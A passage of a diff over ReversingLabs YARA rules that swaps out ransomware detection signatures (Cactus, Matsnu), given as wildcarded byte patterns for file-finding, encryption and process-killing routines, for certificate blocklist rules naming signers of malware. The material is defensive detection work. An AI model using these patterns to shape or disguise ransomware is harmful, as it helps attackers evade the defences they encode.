5C 24 ?? 48 89 44 24 ?? 48 29 CE 48 89 F3 48 F7 DE 48 C1 FE ?? 48 21 CE 48 8B BC 24 - ?? ?? ?? ?? 48 01 FE 48 89 74 24 ?? 48 29 CA 48 89 54 24 ?? 48 89 5C 24 ?? E8 ?? ?? - ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 0F 85 ?? - ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54 - 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 F8 ?? 0F 8D ?? ?? ?? ?? 48 C1 E0 ?? 48 8B - 4C 24 ?? 48 39 C8 0F 87 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B - 35 ?? ?? ?? ?? 48 89 14 24 48 89 5C 24 ?? 48 89 74 24 ?? 48 8B 54 24 ?? 48 29 C2 48 - 89 D3 48 F7 DA 48 C1 FA ?? 48 21 C2 48 8B B4 24 ?? ?? ?? ?? 48 01 F2 48 89 54 24 ?? - 48 29 C1 48 89 4C 24 ?? 48 89 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? - 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? - ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 - 81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24 - ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 - } - $find_files = { - 65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83 - EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? - 48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 - 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 54 - 24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? - E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 94 - 24 ?? ?? ?? ?? 48 89 14 24 48 8B 9C 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 44 24 ?? 48 - 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ?? - ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 04 24 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 85 C9 75 - ?? 48 89 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 74 ?? 48 8B 44 - 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? - C3 48 8B 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? - 48 83 C4 ?? C3 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48 - 83 C4 ?? C3 48 8B 44 24 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Max Steinhard" and (pe.signatures[i].serial=="00:e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5" or pe.signatures[i].serial=="e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5") and 1656288000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6E44Fcedd49F22F7A28Cecc99104F61A : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "b69a4e06-a732-5462-b2b1-bdde3fd34e31" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12500-L12516" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "caff0cbca45c0dffb673367585824783371f2f4e31a0c9629afb7de708098892" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($drop_ransom_note) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "M-Trans Maciej Caban" and pe.signatures[i].serial=="6e:44:fc:ed:d4:9f:22:f7:a2:8c:ec:c9:91:04:f6:1a" and 1672923378<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Cactus : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_35B49Ee870Aea532E6Ef0A4987105C8F : INFO FILE { meta: - description = "Yara rule that detects Cactus ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f391919a-b433-5f8d-8051-f0467118fa1b" - date = "2023-12-15" - modified = "2023-12-15" + id = "88dedb69-52f4-59d3-b397-6a091a866cc5" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Cactus.yara#L1-L190" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2953b67e926cb653df0de208b098da3d5c16e6690842ab28fbf8c37cd16f54d7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12518-L12534" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a9d8e9db453f40e32a0cb6412db8885db54053fdf3d7908b884361a493f97b1f" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Cactus" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 41 57 41 56 41 55 41 54 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24 - ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? - ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 - 89 85 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 4C 8D 4D - ?? 4C 8D 45 ?? 48 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 - 89 54 24 ?? 48 8B 95 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 CA 48 89 C1 E8 ?? ?? ?? ?? 48 - 8D 45 ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 - ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 - 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA - 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA - ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C2 - 48 8D 85 ?? ?? ?? ?? 41 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? - ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D - } - $encrypt_files_p2 = { - 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ?? - ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? - ?? 48 83 C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 - ?? ?? ?? ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? - ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 29 - C2 48 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 39 85 ?? ?? ?? ?? 0F 8D ?? ?? ?? - ?? 48 89 E0 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 85 C0 48 0F 48 C2 48 C1 F8 - ?? 48 C1 E0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 43 ?? 48 89 85 ?? ?? - ?? ?? 48 89 D8 49 89 C4 41 BD ?? ?? ?? ?? 48 89 D8 49 89 C6 41 BF ?? ?? ?? ?? 48 89 - D8 48 83 C0 ?? 48 C1 E8 ?? 48 C1 E0 ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D 44 24 ?? 48 83 - C0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? - ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 41 89 D9 4C 8B 85 ?? ?? ?? ?? 48 89 E9 48 8D - 55 ?? 48 8B 85 ?? ?? ?? ?? 44 89 4C 24 ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? - 48 8B 85 ?? ?? ?? ?? F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ?? - ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 - 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 2B 85 - ?? ?? ?? ?? 48 89 C2 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 - } - $encrypt_files_p3 = { - 48 89 DA 48 8B 85 ?? ?? ?? ?? 48 01 D0 48 89 85 ?? ?? ?? ?? 90 48 89 F4 E9 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 48 63 C8 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 - 89 C1 E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 89 E9 48 8D 55 ?? 48 8B 85 ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? - ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ?? ?? 48 - 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 85 ?? - ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 F0 ?? 84 - C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 98 48 8D 55 ?? 48 01 C2 48 89 E9 48 8B 85 ?? ?? ?? - ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ?? - ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D 95 ?? ?? - ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? - 48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 83 - C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? - ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 - } - $encrypt_files_p4 = { - C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 - E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 - ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 - C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 DB 74 ?? 48 8D 45 ?? 48 89 C1 E8 - ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? - 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ?? - FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D - 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 F4 48 89 C3 EB ?? 48 89 C3 48 8D - 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? - ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? - ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8D A5 ?? ?? - ?? ?? 5B 5E 41 5C 41 5D 41 5E 41 5F 5D C3 - } - $find_files_p1 = { - 55 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? - ?? ?? ?? 48 8D 45 ?? BB ?? ?? ?? ?? 48 89 C6 EB ?? 48 89 F1 E8 ?? ?? ?? ?? 48 83 EB - ?? 48 83 C6 ?? 48 85 DB 79 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 - 0F 95 C0 84 C0 74 ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? - ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? - ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? - 84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 - ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? - ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? - ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - E9 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63 - D2 48 C1 E2 ?? 48 01 C2 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 - E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 - } - $find_files_p2 = { - 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 C1 E2 ?? 48 01 C2 48 - 8D 85 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D - 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? - 83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? C6 05 ?? - ?? ?? ?? ?? 48 8D 5D ?? 48 81 C3 ?? ?? ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ?? - 48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 - C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? - ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 - C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ?? - ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C6 48 8D 5D ?? 48 81 C3 ?? ?? - ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ?? 48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 48 89 - F0 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5B 5E 5D C3 - } - $check_processes = { - 55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? EB ?? 8B 45 ?? 48 98 48 8D 14 C5 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 8B 1C 02 48 - 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 85 - C0 0F 95 C0 84 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? B8 - ?? ?? ?? ?? 48 83 C4 ?? 5B 5D C3 - } - $kill_file_processes_p1 = { - 55 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? C6 85 ?? - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF C0 - 0F 11 45 ?? F3 0F 6F 4D ?? 0F 11 8D ?? ?? ?? ?? F3 0F 6F 55 ?? 0F 11 95 ?? ?? ?? ?? - F3 0F 6F 5D ?? 0F 11 9D ?? ?? ?? ?? F3 0F 6F 65 ?? 0F 11 A5 ?? ?? ?? ?? 0F B7 45 ?? - 66 89 85 ?? ?? 00 00 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? - ?? 48 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 41 B9 - ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 - 84 C0 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C - 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 41 B9 ?? - ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? - 8B 85 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? - E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 C0 48 69 F0 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF - D0 49 89 F0 BA ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? - 48 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? - E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C 8B 8D ?? ?? - ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 - } - $kill_file_processes_p2 = { - 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? - 85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ?? - 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? - ?? ?? E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 - 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 - 98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0 8B 00 39 85 ?? ?? ?? ?? 75 ?? - 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 48 - 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0 - 8B 00 41 89 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? - ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 85 ?? ?? ?? ?? - 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? - ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 - 8D 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 - E8 ?? ?? ?? ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 48 63 C8 48 8D 45 ?? 48 8D 55 - ?? 49 C7 C1 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ?? - ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($check_processes) and ( all of ($kill_file_processes_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kancelaria Adwokacka Adwokat Aleksandra Krzemi\\xC5\\x84ska" and pe.signatures[i].serial=="35:b4:9e:e8:70:ae:a5:32:e6:ef:0a:49:87:10:5c:8f" and 1663151018<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Matsnu : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_063Dcd7D7B0Bc77Cac844C7213Be3989 : INFO FILE { meta: - description = "Yara rule that detects Matsnu ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2f0bddd5-bd48-5d38-84f4-2dbccbe04a46" - date = "2020-07-15" - modified = "2020-07-15" + id = "1bf4b84b-4a32-5908-8ccb-9fce2e5944e6" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Matsnu.yara#L1-L116" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "76ef1b4a292f27ccd904e80f0279a7a327f7399a21f2266ef3ea959e5339ffac" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12536-L12552" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = 